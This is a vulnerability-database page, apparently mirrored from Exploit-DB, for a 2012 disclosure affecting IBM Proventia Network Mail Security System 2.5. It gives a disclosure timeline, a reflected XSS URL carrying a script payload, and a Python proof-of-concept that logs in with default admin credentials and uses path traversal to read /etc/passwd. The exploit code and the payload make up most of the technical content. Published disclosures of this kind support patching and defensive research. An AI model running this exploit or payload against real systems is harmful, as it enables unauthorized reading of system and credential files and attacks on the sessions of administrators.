Lucene search
+L

IBM Proventia Network Mail Security System 2.5 - POST File Read

🗓️ 08 Aug 2012 00:00:00Reported by mutsType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 19 Views

IBM Proventia Network Mail Security System 2.5 POST File Read vulnerability disclosur

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2012-2202
8 Aug 201200:00
circl
Circl
CVE-2012-2955
8 Aug 201200:00
circl
CVE
CVE-2012-2202
27 Jul 201210:00
cve
CVE
CVE-2012-2955
20 Jul 201210:00
cve
Cvelist
CVE-2012-2202
27 Jul 201210:00
cvelist
Cvelist
CVE-2012-2955
20 Jul 201210:00
cvelist
EUVD
EUVD-2012-2196
7 Oct 202500:30
euvd
EUVD
EUVD-2012-2933
7 Oct 202500:30
euvd
NVD
CVE-2012-2202
27 Jul 201210:27
nvd
NVD
CVE-2012-2955
20 Jul 201210:40
nvd
Rows per page
#!/usr/bin/python

'''

Author: muts of Offensive Security
Product: IBM ISS Proventia Mail Security
Version: 2.5
Vendor Site: http://www.ibm.com/us/en/
Product Page: http://www-935.ibm.com/services/us/en/it-services/proventia-network-mail-security-system.html

Timeline:

04 Jun 2012: Vulnerability reported to CERT
08 Jun 2012: Response received from CERT with disclosure date set to 20 Jul 2012
19 Jul 2012: Reflected XSS Fixed: http://www-01.ibm.com/support/docview.wss?uid=swg21605626
19 Jul 2012: Arbitrary File Read Fixed: http://www-01.ibm.com/support/docview.wss?uid=swg21605630
08 Aug 2012: Public Disclosure

The application is vulnerable to a post-authentication reflected XSS:
https://server/pvm_eventlog_backend/logs_eventDetails.php?recordNumber=42&alertID=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert%28123%29%3C/script%3E&MaxEvents=0]]

In addition, there is also a post-authentcation arbitary file-reading vulnerability. The proof of concept code below can be used to replicate the vulnerability.

'''

# IBM Proventia Network Mail Security System POST file read

import urllib
import urllib2
import httplib

username = "admin"
password = "admin"

url = "https://172.16.254.180/javatester_init.php"

password_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
password_mgr.add_password(None, "https://172.16.254.180/", username, password)
handler = urllib2.HTTPBasicAuthHandler(password_mgr)
opener = urllib2.build_opener(handler)
data = urllib.urlencode({'template' : '../../../../../etc/passwd','async' : '3','access' : 'direct'})
req = urllib2.Request(url, data)
f = opener.open(req)
print f.read()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 Aug 2012 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 24.3
EPSS0.03039
19